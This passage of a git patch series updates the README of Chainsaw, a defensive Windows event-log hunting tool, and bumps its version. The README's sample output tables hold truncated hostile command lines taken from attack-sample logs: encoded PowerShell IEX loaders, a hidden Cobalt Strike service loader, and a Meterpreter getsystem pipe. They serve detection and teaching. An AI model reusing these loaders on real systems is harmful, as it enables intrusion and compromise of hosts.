│ - │ │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ (use --full to show all content) │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-08-14 12:17:14 │ ‣ Encoded FromBase64String │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wscript.exe │ "c:\windows\system32\wscript.exe" /E:vbs │ "C:\Windows\system32\rundll32.exe" zipfl │ - │ │ ‣ Encoded IEX │ │ │ │ c:\windows\temp\icon.ico "powershell -e │ dr.dll,RouteTheCall shell:::{769f9427-3c │ - │ │ │ │ │ │ xec bypass -c ""IEX ([System.Text.Encodi │ c6-4b62-be14-2a705115b7ab} │ - │ │ │ │ │ │ ng]::ASCII.GetString([System.Convert]::F │ │ - │ │ │ │ │ │ romBase64String('JFhYPUlFWCgoJ1snICsgW2N │ │ - │ │ │ │ │ │ dOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNic │ │ - │ │ │ │ │ │ gKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDU │ │ - │ │ │ │ │ │ zICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZ │ │ - │ │ │ │ │ │ mICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyB │ │ - │ │ │ │ │ │ 7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1 │ │ - │ │ │ │ │ │ bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHY │ │ - │ │ │ │ │ │ vMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnN │ │ - │ │ │ │ │ │ lKCRkKTtJRVgoWyc... │ │ - │ │ │ │ │ │ │ │ - │ │ │ │ │ │ (use --full to show all content) │ │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2019-11-03 13:51:58 │ ‣ Suspicious Shells Spawn │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\cmd.exe │ "C:\Windows\system32\cmd.exe" /c set > c │ "c:\Program Files\Microsoft SQL Server\M │ - │ │ by SQL Server │ │ │ │ :\users\\public\netstat.txt │ SSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.ex │ - │ │ │ │ │ │ │ e" -sSQLEXPRESS │ - ├─────────────────────┼───────────────────────────────┼───────┼─────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤ - │ 2020-10-20 22:33:02 │ ‣ Trickbot Malware Activity │ 1 │ MSEDGEWIN10 │ C:\Windows\System32\wermgr.exe │ C:\Windows\system32\wermgr.exe │ rundll32.exe c:\temp\winfire.dll,DllRegi │ - │ │ │ │ │ │ │ sterServer │ - └─────────────────────┴───────────────────────────────┴───────┴─────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘ + [+] Group: Antivirus + ┌─────────────────────┬────────────────────┬──────────┬───────────┬─────────────┬────────────────────────────────┬──────────────────────────────────┬────────────────────┐ + │ timestamp │ detections │ Event ID │ Record ID │ Computer │ Threat Name │ Threat Path │ User │ + ├─────────────────────┼────────────────────┼──────────┼───────────┼─────────────┼────────────────────────────────┼──────────────────────────────────┼────────────────────┤ + │ 2019-07-18 20:40:00 │ ‣ Windows Defender │ 1116 │ 37 │ MSEDGEWIN10 │ Trojan:PowerShell/Powersploit. │ file:_C:\AtomicRedTeam\atomic- │ MSEDGEWIN10\IEUser │ + │ │ │ │ │ │ M │ red-team-master\atomics\T1056\ │ │ + │ │ │ │ │ │ │ Get-Keystrokes.ps1 │ │ + ├─────────────────────┼────────────────────┼──────────┼───────────┼─────────────┼────────────────────────────────┼──────────────────────────────────┼────────────────────┤ + │ 2019-07-18 20:53:31 │ ‣ Windows Defender │ 1117 │ 106 │ MSEDGEWIN10 │ Trojan:XML/Exeselrun.gen!A │ file:_C:\AtomicRedTeam\atomic- │ MSEDGEWIN10\IEUser │ + │ │ │ │ │ │ │ red-team-master\atomics\T1086\ │ │ + │ │ │ │ │ │ │ payloads\test.xsl │ │ + └─────────────────────┴────────────────────┴──────────┴───────────┴─────────────┴────────────────────────────────┴──────────────────────────────────┴────────────────────┘ + + [+] Group: Log Tampering + ┌─────────────────────┬───────────────────────────────┬──────────┬───────────┬────────────────────────────────┬───────────────┐ + │ timestamp │ detections │ Event ID │ Record ID │ Computer │ User │ + ├─────────────────────┼───────────────────────────────┼──────────┼───────────┼────────────────────────────────┼───────────────┤ + │ 2019-01-20 07:00:50 │ ‣ Security Audit Logs Cleared │ 1102 │ 32853 │ WIN-77LTAPHIQ1R.example.corp │ Administrator │ + └─────────────────────┴───────────────────────────────┴──────────┴───────────┴────────────────────────────────┴───────────────┘ + + [+] Group: Sigma + ┌─────────────────────┬────────────────────────────────┬───────┬────────────────────────────────┬──────────┬───────────┬──────────────────────────┬──────────────────────────────────┐ + │ timestamp │ detections │ count │ Event.System.Provider │ Event ID │ Record ID │ Computer │ Event Data │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-04-29 20:59:14 │ ‣ Malicious Named Pipe │ 1 │ Microsoft-Windows-Sysmon │ 18 │ 8046 │ IEWIN7 │ --- │ + │ │ │ │ │ │ │ │ Image: System │ + │ │ │ │ │ │ │ │ PipeName: "\\46a676ab7f179e511 │ + │ │ │ │ │ │ │ │ e30dd2dc41bd388" │ + │ │ │ │ │ │ │ │ ProcessGuid: 365ABB72-D9C4-5CC │ + │ │ │ │ │ │ │ │ 7-0000-0010EA030000 │ + │ │ │ │ │ │ │ │ ProcessId: 4 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-04-29 20:59:14. │ + │ │ │ │ │ │ │ │ 430" │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-04-30 20:26:51 │ ‣ CobaltStrike Service │ 1 │ Microsoft-Windows-Sysmon │ 13 │ 9806 │ IEWIN7 │ --- │ + │ │ Installations in Registry │ │ │ │ │ │ Details: "%%COMSPEC%% /b /c st │ + │ │ │ │ │ │ │ │ art /b /min powershell.exe -no │ + │ │ │ │ │ │ │ │ p -w hidden -noni -c \"if([Int │ + │ │ │ │ │ │ │ │ Ptr]::Size -eq 4){$b='powershe │ + │ │ │ │ │ │ │ │ ll.exe'}else{$b=$env:windir+'\ │ + │ │ │ │ │ │ │ │ \syswow64\\WindowsPowerShell\\ │ + │ │ │ │ │ │ │ │ v1.0\\powershell.exe'};$s=New- │ + │ │ │ │ │ │ │ │ Object System.Diagnostics.Proc │ + │ │ │ │ │ │ │ │ essStartInfo;$s.FileName=$b;$s │ + │ │ │ │ │ │ │ │ .Arguments='-noni -nop -w hidd │ + │ │ │ │ │ │ │ │ en -c &([scriptblock]::create( │ + │ │ │ │ │ │ │ │ (New-Object IO.StreamReader(Ne │ + │ │ │ │ │ │ │ │ w-Object IO.Compression.GzipSt │ + │ │ │ │ │ │ │ │ ream((New-Object IO.MemoryStre │ + │ │ │ │ │ │ │ │ am(,[Convert]::FromBase64Strin │ + │ │ │ │ │ │ │ │ g(''H4sIAIuvyFwCA7VW+2/aSBD+OZ │ + │ │ │ │ │ │ │ │ H6P1... │ + │ │ │ │ │ │ │ │ (use --full to show all content) │ + │ │ │ │ │ │ │ │ EventType: SetValue │ + │ │ │ │ │ │ │ │ Image: "C:\\Windows\\system32\ │ + │ │ │ │ │ │ │ │ \services.exe" │ + │ │ │ │ │ │ │ │ ProcessGuid: 365ABB72-2586-5CC │ + │ │ │ │ │ │ │ │ 9-0000-0010DC530000 │ + │ │ │ │ │ │ │ │ ProcessId: 460 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ TargetObject: "HKLM\\System\\C │ + │ │ │ │ │ │ │ │ urrentControlSet\\services\\he │ + │ │ │ │ │ │ │ │ llo\\ImagePath" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-04-30 20:26:51. │ + │ │ │ │ │ │ │ │ 934" │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-05-12 12:52:43 │ ‣ Meterpreter or Cobalt │ 1 │ Service Control Manager │ 7045 │ 10446 │ IEWIN7 │ --- │ + │ │ Strike Getsystem Service │ │ │ │ │ │ AccountName: LocalSystem │ + │ │ Installation │ │ │ │ │ │ ImagePath: "%COMSPEC% /c ping │ + │ │ │ │ │ │ │ │ -n 1 127.0.0.1 >nul && echo 'W │ + │ │ │ │ │ │ │ │ inPwnage' > \\\\.\\pipe\\WinPw │ + │ │ │ │ │ │ │ │ nagePipe" │ + │ │ │ │ │ │ │ │ ServiceName: WinPwnage │ + │ │ │ │ │ │ │ │ ServiceType: user mode service │ + │ │ │ │ │ │ │ │ StartType: demand start │ + ├─────────────────────┼────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼──────────────────────────┼──────────────────────────────────┤ + │ 2019-06-21 07:35:37 │ ‣ Dumpert Process Dumper │ 1 │ Microsoft-Windows-Sysmon │ 11 │ 238375 │ alice.insecurebank.local │ --- │ + │ │ │ │ │ │ │ │ CreationUtcTime: "2019-06-21 0 │ + │ │ │ │ │ │ │ │ 6:53:03.227" │ + │ │ │ │ │ │ │ │ Image: "C:\\Users\\administrat │ + │ │ │ │ │ │ │ │ or\\Desktop\\x64\\Outflank-Dum │ + │ │ │ │ │ │ │ │ pert.exe" │ + │ │ │ │ │ │ │ │ ProcessGuid: ECAD0485-88C9-5D0 │ + │ │ │ │ │ │ │ │ C-0000-0010348C1D00 │ + │ │ │ │ │ │ │ │ ProcessId: 3572 │ + │ │ │ │ │ │ │ │ RuleName: "" │ + │ │ │ │ │ │ │ │ TargetFilename: "C:\\Windows\\ │ + │ │ │ │ │ │ │ │ Temp\\dumpert.dmp" │ + │ │ │ │ │ │ │ │ UtcTime: "2019-06-21 07:35:37. │ + │ │ │ │ │ │ │ │ 324" │ + └─────────────────────┴────────────────────────────────┴───────┴────────────────────────────────┴──────────┴───────────┴──────────────────────────┴──────────────────────────────────┘ ## Table Of Contents @@ -98,6 +136,7 @@ Chainsaw provides a powerful ‘first-response’ capability to quickly identify - [Quick Start Guide](#quick-start-guide) - [Downloading and Running](#downloading-and-running) - [EDR and AV Warnings](#edr-and-av-warnings) + - [What Changed In Chainsaw v2](#what-changed-in-chainsaw-v2) - [Examples](#examples) - [Searching](#searching) - [Hunting](#hunting) @@ -116,7 +155,7 @@ At the time of writing, there are very few open-source, standalone tools that pr ## Hunting Logic ### Sigma Rule Matching -Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw what event IDs to run the detection rules against, and what fields are relevant. By default the following event IDs are supported: +Using the `--sigma` and `--mapping` parameters you can specify a directory containing a subset of SIGMA detection rules (or just the entire SIGMA git repo) and chainsaw will automatically load, convert and run these rules against the provided event logs. The mapping file tells chainsaw which fields in the event logs to use for rule matching. By default, Chainsaw supports a wide range of Event Log types, including but not limited to: |Event Type|Event ID | |--|--| @@ -130,6 +169,8 @@ Using the `--sigma` and `--mapping` parameters you can specify a directory conta |Scheduled Task Creation|4698| |Service Creation|7045| +See the mapping file for the full list of fields that are used for rule detection, and feel free to extend it to your needs. + ### Chainsaw Detection Rules In addition to supporting sigma rules, Chainsaw also supports a custom rule format. In the repository you will find a `rules` directory that contains various Chainsaw rules that allows users to: @@ -163,7 +204,7 @@ git clone https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES.git ``` and then run Chainsaw with the parameters below: ``` -./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml +./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml ``` ### EDR and AV Warnings @@ -171,6 +212,23 @@ When downloading and running chainsaw you may find that your local EDR / AntiVir These warnings are typically due to the example event logs and/or Sigma rules which contain references to malicious strings (e.g. "mimikatz"). We have also seen instances where the Chainsaw binary has been detected by a small subset of Anti-Virus engines likely due to some form of heuristics detection. +### What Changed In Chainsaw v2? + +In July 2022 we released version 2 of Chainsaw which is a major overhaul of how Chainsaw operates. Chainsaw v2 contains a number of significant improvements, including the following list of highlights: + + - An improved approach to mapping Sigma rules which results in a significant increase in the number of supported Chainsaw rules, and Event Log event types. + - Improved CLI output which shows a snapshot of all Event Data for event logs containing detections. + - Support for loading and parsing Event Logs in both JSON and XML format. + - Cleaner and simpler command line arguments for the Hunt and Search features. + - Additional optional output information, such as Rule Author, Rule Status, Rule Level etc. + - The ability to filter loaded rules by status, kind, and severity level. + - Inbuilt Chainsaw Detection rules have been broken out into dedicated Chainsaw rule files + - A clean and rewrite of Chainsaw's code to improve readability and to reduce the overhead for community contributions. + +If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.1.7 branch](https://github.com/countercept/chainsaw/tree/v1.1.7). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2. + +A massive thank you to [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) who managed to convert Chainsaw v1's "Christmas Project" codebase into a polished product in v2. + ## Examples ### Searching @@ -255,15 +313,15 @@ These warnings are typically due to the example event logs and/or Sigma rules wh *Hunt through all evtx files using Sigma rules for detection logic* - ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml *Hunt through all evtx files using Sigma rules and Chainsaw rules for detection logic and output in CSV format to the results folder* - ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ --csv --output results + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml -r rules/ --csv --output results *Hunt through all evtx files using Sigma rules for detection logic, only search between specific timestamps, and output the results in JSON format* - ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping mappings/sigma-event-logs.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping mappings/sigma-event-logs-all.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json ### Acknowledgements - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [@SBousseaden](https://twitter.com/SBousseaden) From 856b3215df3d995710c66be55fc973359f6d04ff Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 23:20:31 +0100 Subject: [PATCH 76/77] build: bump to v2.0.0-beta.0 --- Cargo.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index e9d3c540..7972cdd7 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.6" +version = "2.0.0-beta.0" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From 43b49dacfa307bb2df65e2a933fc47a89e77e8e8 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 11 Jul 2022 23:27:06 +0100 Subject: [PATCH 77/77] docs: update readme for beta release --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 4b1ebe86..d485c335 100644 --- a/README.md +++ b/README.md @@ -225,7 +225,7 @@ In July 2022 we released version 2 of Chainsaw which is a major overhaul of how - Inbuilt Chainsaw Detection rules have been broken out into dedicated Chainsaw rule files - A clean and rewrite of Chainsaw's code to improve readability and to reduce the overhead for community contributions. -If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.1.7 branch](https://github.com/countercept/chainsaw/tree/v1.1.7). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2. +If you still wish to use the version 1 of Chainsaw, you can find compiled binaries in the [releases section](https://github.com/countercept/chainsaw/releases), or you can access the source code in the [v1.x.x branch](https://github.com/countercept/chainsaw/tree/v1.x.x). Please note that Chainsaw v1 is no longer being maintained, and all users should look to move to Chainsaw v2. A massive thank you to [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) who managed to convert Chainsaw v1's "Christmas Project" codebase into a polished product in v2.